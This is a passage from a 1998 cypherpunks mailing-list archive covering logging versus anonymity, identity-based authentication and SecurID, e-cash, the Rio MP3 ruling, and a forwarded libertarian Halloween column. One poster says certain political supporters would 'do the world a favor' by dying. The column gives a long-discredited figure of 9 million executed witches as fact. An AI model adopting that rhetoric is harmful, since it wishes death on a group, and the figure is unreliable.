is -- and I'm doffing my security hat here and donning the hat of someone
who has been running computer systems and networks for 30+ years --
when I'm trying to manage a system and/or troubleshoot a problem,
I *want* log files, as many as I can get and cross-referenced 17 different
ways.  This isn't a security issue -- most system administrator headaches are
due to the "benign indifference of the universe", or maybe to Murphy's Law
-- but simply a question of having enough information to trace the
the perturbations caused to the system by any given stimulus.

The more anonymity, and the more privacy cut-outs, the harder this is.
I claim, therefore, that the true cost of running such a system is
inherently *higher*.  There may be, as some have claimed, offesetting
operational advantages.  But the savings from those advantages need to
be balanced against losses due to hard-to-find bugs, or even bugs that
one isn't aware of because there's insufficient logging.  Remember
that double-entry bookkeeping catches all sorts of errors, not just
(or even primarily) embezzlement.

To be sure, one can assert that the philosophical gains -- privacy,
libertarianism, what have you -- are sufficiently important that this
price is worth paying.  With all due respect, I will assert that
that debate is off-topic for this list, and is best discussed over
large quantities of ethanol.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Mon, 26 Oct 1998 16:20:48 +0800
To: cypherpunks@Algebra.COM
Subject: Re: so, what did Toto *do*,......
In-Reply-To: <199810251155.HAA11099@privacy.nb.ca>
Message-ID: <3.0.5.32.19981026175759.007e9100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 07:55 AM 10/25/98 -0400, Joseph 'Anonymous' Howe wrote:
>Reeza! wrote:
>> 
>> >all seen posted here. Personally, I found them a lot milder than Reeza!'s
>> >projection of his suicide fantasies, for instance.
>> 
>> Huh? Well Goodness Fuck, Does this mean I am notorious as well?
>
>In a post primarily about your feelings about Klinton, you outlined
>a detailed suicide fantasy ("meet your maker") and suggested other people
>might like to eat a bullet too. That's closer to presidential assasination
>than Toto ever got.

If you will review that again, you will find that the barb was directed
towards persons other than the President. I may not like THAT man, but I
still must respect the Office and position he holds. I was not calling for
a sanction of the president. I was suggesting in very blunt terms that
various of his supporters would do the world a favor by getting off (of
it). Especially the ones who rationalize and dismiss his various (and
multiple) piccadilloes because he supports their pet social project.

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 07:39:34 +0800
To: cypherpunks@cyberpass.net
Subject: Available For Download: Chapter on Electronic Cash for  Upcoming Handbook by CRC Press
Message-ID: <v04020a2bb25aafe7fdde@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: brands@xs4all.nl
X-Sender: brands@xs4all.nl (Unverified)
Date: Mon, 26 Oct 1998 22:09:06 +0100
To: Robert Hettinga <rah@shipwright.com>
Subject: Available For Download: Chapter on Electronic Cash for  Upcoming
 Handbook by CRC Press
Cc: Digital Bearer Settlement List <dbs@philodox.com>
Mime-Version: 1.0
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

Hi all,

In light of some questions about my electronic cash systems by Frank Sudia
and Robert Hettinga, and some requests I received via e-mail, I decided to
make available my chapter on electronic cash that I wrote mid 1996 for the
upcoming "Handbook on Algorithms and Theory of Computation," Michael
Atallah (editor), CRC Press, ISBN 0849326494. It is an introduction to
electronic cash, and contains a high-level description of my system as well
as a highly practical implementations of it.

You can download the PDF file from

	http://www.xs4all.nl/~brands

Alternatively, get it directly as

	http://www.xs4all.nl/~brands/draft.pdf

Regards,
Stefan

PS The above book chapter has a very narrow focus, and does a poor job of
highlighting the generality of my techniques, which are much more generally
applicable than just for the purpose of electronic cash. Over the past two
years, I have been busy writing a book, with the preliminary title
"Electronic Money and Digital Eligibility Certificates." Currently, over
500 of the approximately 750 pages are finished, and I aim to have it
published early next year. If the publisher allows it, large parts of the
book will be made available as PDF files as well, but nothing is clear yet.
There are also some very real commercial things happening right now; I hope
to be able to announce something in the next few months as well.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Tue, 27 Oct 1998 06:53:40 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and  Sending the Wizards Back to Menlo Park
In-Reply-To: <v04003a08b2551ff61c93@[198.115.179.81]>
Message-ID: <v04003a04b257b75fea2c@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain



[Subtitle:"Identity, Authentication, & Dunkin Donut Mysticism."]

	At 12:18 AM -0400 on 10/23/98, Vin McLellan, speaking for legions of
SDTI/RSADSI fans (and, evidently, retainers), wrote:

>> 	Hettinga's apparent scorn for modern cryptography's obsession with
>> strong authentication  -- now manifest in the intensity with which
>> professionals worry the issues around PKC binding, key certification,
>> digital signatures, CA procedures (and in the demand for smartcards to
>> secure X509 certs apart from the networked CPU) -- bespeaks a truly
>> iconoclastic mind.

	At which, Mr. Hettinga took a bow ("Thank you. I think.") and
proceeded to argue for his Vision, yet again:

>Look, folks, "strong authentication" is not the problem. It's biometric
>*identity* which is the problem. Cryptography gives us the ability to do
>away with "identity"-based key-mapping altogether. A key is a permission to
>do something specific with a microprocessor, no more, or less. It doesn't
>"mean" anything else. Certainly, if you go back and look at the actual,
>legal, definitions of "signature", or "certificate", they don't mean what
>people like Verisign (or say, the State of Utah) says their authentication
>technology does.

	But what if we don't _want_ to lose the link between a key (think
of it as a secret) and the identity of a biological entity?

	What if -- instead of anonymity -- our goal is accountability?

	Truth is, I don't think we're reading from the same page here.

	(Or maybe, more to the point, we've been working in different
dimensions.)

	It strikes me that while Mr. Hettinga and other e$ seers may have
spent the past decade considering how to allow transactional exchanges to
escape a human linkage, most professional sysops and network managers have
been concerned with how to strengthen the linkage between on-line accounts,
actions, and audit trails -- and the humans to which a user's account has
been assigned.

	In this context, any capacity of modern cryptography "to do away
with 'identity'-based key-mapping" is irrelvant or worse. The mechanics of
"user authentication" -- validating that a remote human is indeed the same
human earlier enrolled and assigned a user account on this computer system
-- are the foundation of whatever we know about computer and network
security today.

	It may be that the structure and requirements of contemporary
corporate networks are irrelevant, just so much background babel, to
e-commerce visionaries like Rob and others on the e$ lists. This is a
problem in both cultures. Mr. Hettinga intones:

>Software will be utterly replicable and will be sold recursively, and
>untraceably, on a bearer basis, primarily because that's the cheapest way
>to safely trade money for information on a ubiquitous geodesic public
>network.

	... and I nod, a closet Hettinga fan. I trace the outline of his
spiel in my mind like an M.C. Escher tessellation: bug-free software,
stateless utopias, and buyers careless of liability. Charming. 2lst Century
stuff. Maybe. Maybe not.

	Then I turn back to the bet-your-business questions of data and
system security, where (even with a batch of theory that is universally
accepted) implementation hassles routinely swamp practioners.

	The mundane management and control issues associated with system
and network access, and the range of privileges granted to an on-line
entity, remain a vexing problem.  The difficulty and sometimes the cost of
managing reliable "user authentication is an issue;" more often, however,
the core problem is that the owners of systems and networks aren't
convinced the value of the data and systems they have online deserves a
per-user security investment equal to, say, a modem.

	User Authentication, not coincidentally, is the business of SDTI.

	In large part because of the magic of RSA and PKI, the mechanical
and virtual options for user authentication are changing, even as the
fundamentals remain the same.

	In enterprise networks; in extended Extranets; in business to
business connections that replace, enhance, or mimic EDI -- there is great
hope that scalable PKI will allow not only confidentiality and strong
authentication, but also the other cryptographic services possible only
thru public key cryptography: digital sigs for message and source
authentication, non-repudiation (with a trusted Current Time source), and
confidential communications between parties which have had no prior
contact.

	Nitty-gritty wonderful stuff.

	PKI (and the "'identity'-based key-mapping" that Mr. Hettinga is so
eager to do away with) are viewed with great hope among many if not most IT
professionals. Corporate security managers hope that the utility and power
of PKC's extended capabilities will define this security technology as an
"enabler" -- something users want because it makes their work easier --
rather than the auditor-mandated burden that security mechanisms have
traditionally been.

	For 30-odd years, info security professionals have used a model
which declares that there are only three ways for a machine to validate or
authenticate that a remote human is the person who was initially identified
and enrolled (by a trusted Admin) as the user authorized to use a computer
account:

_"something known," a memorized password or PIN;
_"something held," a physical token that can be carried as a personal
identifier; or
_"something one is," a biometric like a fingerprint or voiceprint.

	Graybeards like myself tend to filter all the rumpus about
corporate PKIs and global/local keys through this traditional model -- if
only because many crypto mavens seem so thoughtless about leaving a
potentially powerful piece of data (an PKC private key) relatively
unprotected on a PC or networked workstation.

	The industry's traditional definition of "strong" authentication
demands that an authenticating CPU require direct evidence of at least two
of the three modes of ID authentication before a user is allowed access to
protected resources. (The idea is that an attacker would have to subvert at
least two independent systems to corrupt the authentiation.)

	[For those unfamiliar with the company, SDTI's bread and butter
business is this two-factor authentication. The company is best known for
the three or four million SecurID tokens it has shipped: key fobs or
credit-card sized tokens which continually and automatically hash a secret
seed and Current Time to generate a 6-8 digit alphanumeric "tokencode."

	[SDTI's authentication server, called an ACE/Server, manages the
records of tens of thousands of concurrent SecurID holders and validates or
rejects two-factor authentication calls (a tokencode and a memorized PIN)
which are relayed through a network of outlying ACE/Agents (which are often
embedded in other third-party network products.) Due to the popularity of
the SecurID with users, ACE/Agents are all but ubiquitous. Virtually all
commercial VPNs, firewalls, communication and terminal servers -- multiple
product lines from some 60 independent vendors, from Oracle to IBM -- ship
with ACE/Agent code embedded in them. See: http://www.securid.com/partners ]

	Meanwhile, for one possible future, Mr. Hettinga promotes a
crypto-anarchic buyer/seller paradigm:

>...control of a given cryptographic key is completely orthogonal to
>the idea of identity. You can map an identity to it, but you don't have to,
>because possession of the key is "permission", "authority", enough, all by
>itself. *Who* you give permission to, by name, fingerprint, or physical
>address, doesn't matter....

	Ummm. *Who* matters a great deal to the pros who run today's
networks. Security, audit, and accountability all presume a firm grip on
who is on-line and what he's doing. (Different dimensions, right?)

	For access and privilege managment in PKI-enhanced corporate
network, most of us want -- at the very least! -- an RSA key/secret firmly
mapped to a user/identity.

	[Mind you, until that private or secret key is further protected by
being encased in a token-like smartcard or PCMCIA card -- and until that
smartcard _also_ requires a memorized password or PIN to access or use that
key -- veteran network or system managers will never be comfortable with a
PKC-based authentication...despite the wonderfully grandular controls PKI
can offer on networked resources.  Truth is, we all know that networked PCs
are risky platforms -- so until _all_ the crypto processing is shifted off
the PC to the isolated smartcard, infosec pros will worry and kvetch.
Expect it.]

	Readers who have the patience to read Rob's essays are probably
still with me, so let me point out that this cross-dimensional cat fight
only began when Mr. Hettinga stomped on SDTI and used the companies' recent
travails in the stock market as a launching pad for another essay into the
stratosphere. Were the original post a discussion of the Dow, or even
SDTI's stock price, I'd just duck and run.

	(Frankly, I don't understand the stock market... and, unlike Mr.
Hettinga, I don't have a great deal of respect for the opinions that seem
to inform it. To me it's mostly tulip speculation. Mr. H's pal, "Anonymous"
-- who made his bones with the declaration that SDTI's ACE/SecurID
authentication system is doomed because it is ten years old -- was offering
what many brokers refer to as an in-depth analysis;-)

	I only challenged Mr. Hettinga because his initial comments about
SDTI seemed to indicate such vast ignorance of the contemporary security
market.

	No one who knows anything about SDTI and that market would say that
the only thing SDTI has that is worth anything is its stake in Verisign
(and, of course, it was Rob, not the Globe, who said that.)

	In the absence of ubiquitous smartcard readers, it seems to me
equally foolish to declare that X509 certificates make SecurID and similar
two-factor tokens "obsolete" (and, of course, it was Rob, not the Globe,
who said that too.)

	"Close enough for an Internet rant" doesn't cut it as an apologia
-- not when a prominent commentator smears a public company on a half-dozen
widely-read Internet forums. (Meaning no insult, Rob, but there is a
modicum of responsibility that goes along with all those seats at the front
table.)

	Seemingly piqued by the response to his initial comments, Mr.
Hettinga then got down to a little bare-knuckle company valuation:

>In the meantime, Vin, hang on to your SDTI stock, but probably just for
>it's residual value to some future investor, like SDTI evidently bought
>RSADSI for its own residual value, and, aparently, for whatever mystical
>value the market now puts on Verisign.

	What SDTI _does_ have -- as even the Globe's thumbnail sketch
acknowledged -- is a huge installed base and the stature of a sophisticated
market leader in a dynamic market. SDTI also has a trust relationship with
its customer base, the corporate network managers, that is the envy of many
real or potential competitors. (RSADSI, the SDTI subsidiary, is rather
tight with its customers -- the commercial software developers -- as well.
Both firms have also excelled at developing mutually- advantageous
partnerships with multiple companies.)  For most of the 1990s, SDTI has
also fielded the largest dedicated sales force in the world selling
computer security.

	Against a field of a half-dozen competitors who sell two-factor
authentication systems, SDTI owns over half the market. Among the choice
corporate customers who have installations with more than 1,500 seats, I'd
guess SDTI has over 70 percent of the market.  Among the Fortune 100,
two-thirds of them rely on SecurIDs and ACE authentication servers.

	Potent evidence of SDTI's stature among its customers is in the
results of a recent survey of hundreds of NT network managers by the highly
respected SANS Institute. See: http://sans.org/powertools.htm  Check out
what vendors and security technologies they trust most. Check out what
percentage of SDTI's current customers recommend the company and its
products to others!

	Entrust, NAI, SCC et al would kill for those 90-plus percent
numbers;-)  And the same survey, done today, would probably earn SDTI even
higher marks with their new PKI-based Domain Authentication for NT.

	Quiz: What dbts market commentator airily preaches: "[If] you don't
go looking for money anywhere but in your customer's pockets, you'll do
just fine."  It couldn't be the same guy who's now reeling off these pious
but opaque little fables, could it?

>So, right now, after all that, um, exercise, SDTI/RSADSI/Verisign reminds
>me an awful lot of that old joke about the two old Texas spinsters who,
>walking down a dusty road, came across a talking frog claiming to turn into
>an oil baron, if only one of them would kiss him to prove it.
>
>"A talking frog", said one of them, putting the frog in her apron pocket,
>"is worth something."

	(Hummmm. Betcha froggie -- even if he just wanted a kiss -- would
have taken the time to find out something about the oil business before he
claimed to be an Oil Baron.  Not all self-declared market analysts are so
meticulous;-)

	There are folks who are certain that Y2K will be blessed with the
Second Coming.

	And then there is Mr. Hettinga, Anonymous, and others who have a
gleeful vision of doom, debt, and dismal ROI for Security Dynamics.

	I find both suspect. Luckily, in both cases, we can get the truth
(or at least a consensus one way of the other) within a year or so. I
wouldn't want to wager on the Lord's Schedule, but in the case of SDTI's
fortune and fate -- well, either the Doomsday Prophet or the Optimistic
Courtier will be proven a fool fairly quickly.

	(What's say, Robert?  A New Millenium wager? Winner gets his choice
of either a case of decent wine or a box of hollow points on 01/01/00?)

	Suerte,
		_Vin



-----
      Vin McLellan + The Privacy Guild + <vin@shore.net>
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
                         -- <@><@> --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 08:45:28 +0800
To: Vin McLellan <vin@shore.net>
Subject: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and   Sending the Wizards Back to Menlo Park
In-Reply-To: <v04020a04b2561b978874@[139.167.130.246]>
Message-ID: <v04020a2db25ab6f6a6f8@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:02 PM -0500 on 10/26/98, Vin McLellan wrote:


> 	(Or maybe, more to the point, we've been working in different
> dimensions.)

Right. Exactly. Attacking flatland from the third dimension has always been
my special curse. :-).

<Excellent visit to X.BlaBla Wonderland elided...>

I hope if I can be excused if I don't want to chase you down that
particular rabbit-hole anymore, Vin.

Sorry to disappoint, but there are *lots* of other, more qualified people
around to walk through *that* particular looking glass, to mix my metaphors
like a doormouse.  I'm interested in *lots* of other stuff besides the
traceability of "on-line" audit trails and mapping meatspace book-entry
transaction processing to the internet like so much financial shovelware.

I will, however say, once again, that you can have reputation in
cypherspace without any biometric "identity" whatsoever, modulo the
footprints we all leave when we do stuff anyway. I wrote a rather extended
rant about this a while ago, in November or so last year, and everyone on
these lists has seen it. (Some, unfortunately, more than once. :-).) Let me
know if you want to send it to you under separate cover, and, if memory
serves, it may even be on the old Shipwright site,
<http://www.shipwright.com>.


Anyway, if you'd like to talk to someone who'll take up the cudgel, you
might want to talk to folks like Carl Ellison and Perry Metzger, who just
did an entire session at the USENIX electronic commerce conference on just
this kind of stuff. They're much more, um, curioser and curioser about
key/identity orthogonality than I am. :-). I just assume what they more or
less prove, to my own satisfaction.

I think I've said all I care to on the subject. And watch out for the
little blue mushrooms. The visuals last for days...

Cheers,
Bob Hettinga

PS: I would note, by way of a plug, that the DCSB meeting next Tuesday will
probably be a *great* place to talk about this, as Dan Geer from CertCo
(speaking of the USENIX electronic commerce conference) will certainly be
talking about this kind of thing -- and other such fun stuff.

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 27 Oct 1998 10:44:07 +0800
To: brands@xs4all.nl
Subject: digital cash
Message-ID: <363529FB.686B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

I am reading

http://www.xs4all.nl/~brands/draft.pdf

Attached in mirrored at http://www.aci.net/kalliste/bw1    

I only built THEM.  I am not into crypto.  But sort-of
understand how it works.

Let's hope this gets settled.

bill

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 27 Oct 1998 17:11:41 +0800
To: "'cypherpunks@cyberpass.net>
Subject: FW: Death, Politics and the Net
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7AA6@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




...and I was just thinking the other day it would be cool to create a
government blocking service maintaining a list of disallowed IPs and
providing a click-thru redirect agreement complete with legal
enforcement. ;)

	Matt

-----Original Message-----
From: James S. Tyre [mailto:j.s.tyre@CYBERPASS.NET] 
Sent: Friday, October 23, 1998 2:59 PM
To: CYBERIA-L@LISTSERV.AOL.COM
Subject: Death, Politics and the Net


[There *is* a cyberia connection in here, somewhere, I think.]

I'm sure you all (in the U.S., at least) have heard of the murdered
Tennessee state senator, and that his opponent in the upcoming election
is now charged with the crime.

Well, turns out that the boys aren't just from anywhere in TN, but from
Putnam County, home of the cookie-monster suit between the local guvvies
and the Putnam Pit <http://www.putnampit.com/>.  So, always interested
in alternative viewpoints, thought I'd see what the Pit had to say, in
it's own inimitable way.  Found that its home page now says what
follows. Thought it might interest some, for reasons unrelated to the
alleged crime.

----
Welcome to The Putnam Pit online

Because of the costs associated with producing The Putnam Pit caused by
local government civil rights violations, government officials,
employees and their agents may no longer access this site without a
subscription. This site is a private forum. It is private property and
protected by copyright law and the fourth amendment to the United States
Constitution. If you do not work for or represent the Cookeville or
Putnam County, Tenn., governments, are not using a government computer
or government Internet account and agree no portion of any material
posted here will be made available to the governments of Cookeville or
Putnam County, Tenn., or their agents, click here for free access.


Notice to employees, officials or agents of the Cookeville or Putnam
County, Tenn., governments, and those using a government computer or
government Internet account:
If you are an employee, official or agent of the Cookeville or Putnam
County, Tenn., governments, or you are using a government computer or
government Internet account you must purchase a subscription to access
The Putnam Pit. A subscription costs $20 and may be obtained by sending
a check to The Putnam Pit, P.O. Box 1483, Cookeville, Tenn. 38503. If
you access any page of the material managed and owned by The Putnam Pit,
Inc., without a subscription, you agree by that access to pay $500 per
incident of access to each page accessed every time you access it. You
further agree to waive all rights to contest collection of any debt
thereby incurred, and enter into this agreement on behalf of the
government entity on whose computer or through whose Internet account
your access was facilitated. You further represent by clicking below and
accessing The Putnam Pit's private and copyrighted property to allow The
Putnam Pit or its agents to inspect the hard drive of your computer to
determine the number of times the site was accessed according to he
terms of this contract to determine the amount owed. click here




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: totaltel@total.emap.com
Date: Tue, 27 Oct 1998 09:18:28 +0800
To: cypherpunks@toad.com
Subject: Telecom Italia to Appoint ceo this
Message-ID: <98Oct27.012743gmt.28126@ebc-fw-01.emap.com>
MIME-Version: 1.0
Content-Type: text/plain



Welcome to the Total Telecom news update.

http://www.totaltele.com

-------------------------------------

today's top story:-

Scramble to Appoint Telecom Italia ceo this Week

Telecom Italia SpA, Italy's former telephone monopoly, aims to find a chief executive within a week, an official said, after executive chairman Gian Mario Rossignolo resigned, ending a 10-month tenure 

http://www.totaltele.com/cgi-bin/news.cgi/20250/worldmore.html

*****************************************

ITU Plenipotentiary 98 Conference in Minneapolis.

with the conference moving into it's third week, keep up to date with events as they unfold over the remaining two weeks.  Plus an update of the election results. 

http://www.totaltele.com/plenipot98/

*****************************************

current Total Telecom headlines include.....

Nokia Turns to Networks After Becoming Top Mobile Phone Company

Nokia Oyj, the world's biggest mobile phone company, said it's introducing several products that will boost subscriber capacity up to 10 times as it plans to increase its presence as a network supplier...

http://www.totaltele.com/cgi-bin/news.cgi/20274/worldmore.html
------------------

SBC Moves in on Bell Atlantic with Completion of SNET Buy

SBC Communications Inc. completed its $6.5 billion purchase of Southern New England Telecommunications Corp., moving the No. 2 U.S. local telephone company into No. 1 Bell Atlantic Corp.'s territory. 

http://www.totaltele.com/cgi-bin/news.cgi/20270/worldmore.html
----------------

Carrier 1 Offers ISPs a Pay-Per-Use Service

Carrier 1 has rolled out the first usage-based billing service for pan-European wholesale IP traffic. Europe's newest wholesaler is pitching the pay-per-packet facility as a cost-saving option to attract 

http://www.totaltele.com/cgi-bin/news.cgi/20275/worldmore.html

---------------

Omnicom Revived by Long Distance Supermarket Tie-up

Omnicom SA shares surged 20% after Carrefour SA, France's largest food retailer, picked the French phone company to offer long-distance phone services to its clients. In a partnership with Omnicom, Carrefour......
 
http://www.totaltele.com/cgi-bin/news.cgi/20271/worldmore.html

----------------

Telekom Says No Date Set for Share Sale

Deutsche Telekom AG, Europe's largest telephone company, said it hasn't set a date to sell a second slice of the company, denying a report that a share sale planned for next spring would be postponed. 

http://www.totaltele.com/cgi-bin/news.cgi/20272/worldmore.html
---------------- 

plus

Asian-American Axis Leaves Europe in the Cold

FCC Begins Overhaul of Complex Phone Subsidy System

Telecom Italia Chairman Rossignolo Resigns

Telia Raises Netia Stake Ahead of Polish Deregulation 

AT&T, BellSouth to Form New Company to Manage Wireless Venture

.....go to the front page for the full list of headlines

http://www.totaltele.com

********************************************

Forgotten your password?  For help go to:-

http://www.totaltele.com/register/reghelp.shtml

Any other problems, email:- webmaster@totaltele.com

-------------------

If you wish to be removed from future mailings, please reply 
with "Remove" in the subject line and we will automatically block you from this list.

Thank you for reading Total Telecom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 28 Oct 1998 15:25:33 +0800
To: cypherpunks@cyberpass.net
Subject: FWD: Judge does right thing - Rio goes to market
Message-ID: <3.0.5.32.19981027012937.00b80100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



This is forwarded from the cyberia-l list; looks like the 
judge has done the right thing (or at least for this phase)
by allowing the Rio MP3 player to be shipped.  Yeah!

>Date:         Tue, 27 Oct 1998 03:29:39 -0400
>Sender: Law & Policy of Computer Communications <CYBERIA-L@LISTSERV.AOL.COM>
>From: Michael Sims <jellicle@INCH.COM>
>Subject:      Rio goes to market
>
>http://www.nytimes.com/library/tech/98/10/cyber/articles/27rio.html
>http://www.mp3.com/news/116.html
>http://www.mp3.com/news/117.html
>
>The Judge in the Diamond Multimedia/RIAA lawsuit declines to extend
>her earlier order barring the shipment of the Rio device.
>
>"However, in the 18 page ruling handed down today, Judge Collins
>found that the plaintiff did not demonstrate a causal relationship
>between the Rio and unauthorized copying. Furthermore, she found that
>the Rio did not violate the AHRA in such a way as to warrant an
>injunction."
>
>--
>Michael Sims                            The Censorware Project
>                                        http://censorware.org
>He who breaks a thing to find out what it is, has left the path of wisdom.
>Or is well on the way to becoming an engineer.
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 22:37:49 +0800
To: cypherpunks@cyberpass.net
Subject: Oct. 27 column -- Halloween
Message-ID: <v04020a32b25b6e29b81e@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Mon, 26 Oct 1998 23:17:25 -0700
Date: Mon, 26 Oct 1998 22:06:53 -0800 (PST)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Oct. 27 column -- Halloween
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/576
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED OCT. 27, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    Thoughts on the occasion of the October moon

    The column for which I receive the most "repeat" requests remains my
1992 Halloween submission, "Thoughts on the occasion of the October moon."
That essay follows here, as it originally appeared:


    #  #  #

     Halloween approaches, the day when many an American parent will suit
up the little ones in black robes, matching 17th century conical hats, and
oversized warty noses, sending them off to delight the neighbors with this
impersonation of a witch, as traditionally represented from 17th century
Austrian paintings of the Hexensabbat right up through Disney's "Snow
White."

  Even the newspapers generally play along, running the results of polls
that ask Americans how many actually believe in such mythological creatures
as ghosts, trolls and witches.

  But witches are not mythological creatures, of course. They were the very
real practitioners of a religion which pre-dated Christianity in Europe,
and which had coexisted quite peaceably with the new Christian church for
more than 1,000 years, from the Council of Nicaea until the fateful year
1484 A.D., under the quite sensible rule of the Canon Episcopi, which
instructed Christian clerics through all those years that -- in cases where
sorcery or commerce with the devil was charged but could not be proven --
it was the accuser, not the accused, who was to suffer the penalty for
those crimes.

  Needless to say, this held false charges to a minimum.

  All that changed after 1484, when an ambitious but ethically challenged
Dominican friar and embezzler by the name of Heinrich Kramer managed to
convince Pope Innocent VIII to set the Holy Office of the Inquisition onto
the witches, using torture to extract confessions, authorizing anonymous
accusations without any right for the accused to face her accuser, and
granting the soon-busy witch-hunters the rights to seize and divide the
estates of the accused (who were always found guilty), an invitation to
systematic legal looting so foul that it was never allowed again in Western
history ... until our current War on Drugs, of course.

  As many as 9 million persons -- some doubtless practitioners of the Old
Craft, but many, especially in later years, just as doubtless falsely
accused -- were burned or hanged before the burning times faded away with a
kind of embarrassed shrug in the early 1700s.

  The crime of which they were accused? Worshipping a female deity, a
goddess of the earth, and her male consort, the goat-horned male god of
fertility.

  Christian clerics, themselves mostly illiterate, called this female deity
"the abomination," which has subsequently been interpreted to mean the
horned devil of Hebrew tradition. But practitioners of a fertility cult
would have had little reason to mock the late-comer Christianity by hanging
crosses upside down or reciting masses backwards. "Satanism," to the extent
that it ever existed (and I suspect more black masses were chanted on
London film sets in the 1960s and '70s than anywhere in the four centuries
preceding), is a very different thing.


    #  #  #

    Why should we care about the fate of the witches? For starters, it
appears the witches stressed not the superiority of either sex over the
other, but rather a balance between male and female principles -- an
obvious notion for early agriculturalists trying to come to a metaphorical
understanding of the germination of crops in the "mother" earth thanks to
the intervention of those primeval "male" agencies, the sun and the rain.

  But the culture which destroyed the witches was not merely
male-dominated. The history of our European ancestors of the 16th and 17th
centuries presents a spectacle of bloodthirsty intolerance, a perverse
catalogue of self-flagellation and repulsion at sexuality which found
outlet only in the frenzied drive to conquer and enslave both the natural
world and any other culture that presented itself. No matter how we may
celebrate their competitive superiority from a safe distance, this was
clearly a bunch of sick puppies.

  Was it the plagues, which quite often left the continent literally in the
hands of teenagers? Whatever the reason, using their superior technology of
sail and cannon, and helped mightily by bacteriological allies to which
they had developed at least partial immunity, the Europeans didn't merely
conquer the indigenous populations of the Americas, they ruthlessly
eradicated whole cultures, and with them any medical or other knowledge
they might have had to offer, sweeping all aside as the "spawn of the
devil."

  Meantime, European women were being stripped of their property and other
rights (many "witches," curiously, were widows of independent means), at
precisely the time when their presense in the councils of church and state
might have maintained some semblance of sanity.

  The Europeans of the time adopted little of our hypocritical modern-day
pretense of being horrified at "drug use" per se -- they happily imported
coffee, tobacco, opium, and cocaine. In fact, they forced the opium trade
on China when it proved to be the only thing for which the Chinese would
trade silver bullion.

  But while they reveled in novel forms of drunkenness, what did horrify
those brave conquerors was the use of any hallucinogenic substance as a
means to religious revelation, a superstitious dread of alternative paths
to spiritual enlightenment which still hangs on in our aforementioned and
thoroughly irrational "War on Drugs."

  (Which drug is involved in more incidents of spouse battery and
inter-family murder by a factor of millions-to-1: alcohol or LSD? Which
will get you 20 years in the federal pen, while the other now comes in
convenient "wide-mouth 12-packs"?)

  The wholesale eradication of the cultures of the Aztecs and the Incas was
justified not because of their practice of slavery and ritual slaughter --
Pizarro and Cortes would have found those familiar enough -- but because
they were found to be using peyotl, hallucinogenic mushrooms, and
ololiuhqui (a variety of morning glory seed) in their religious rituals,
sure signs of "witchcraft," and coincidentally a method of seeking direct
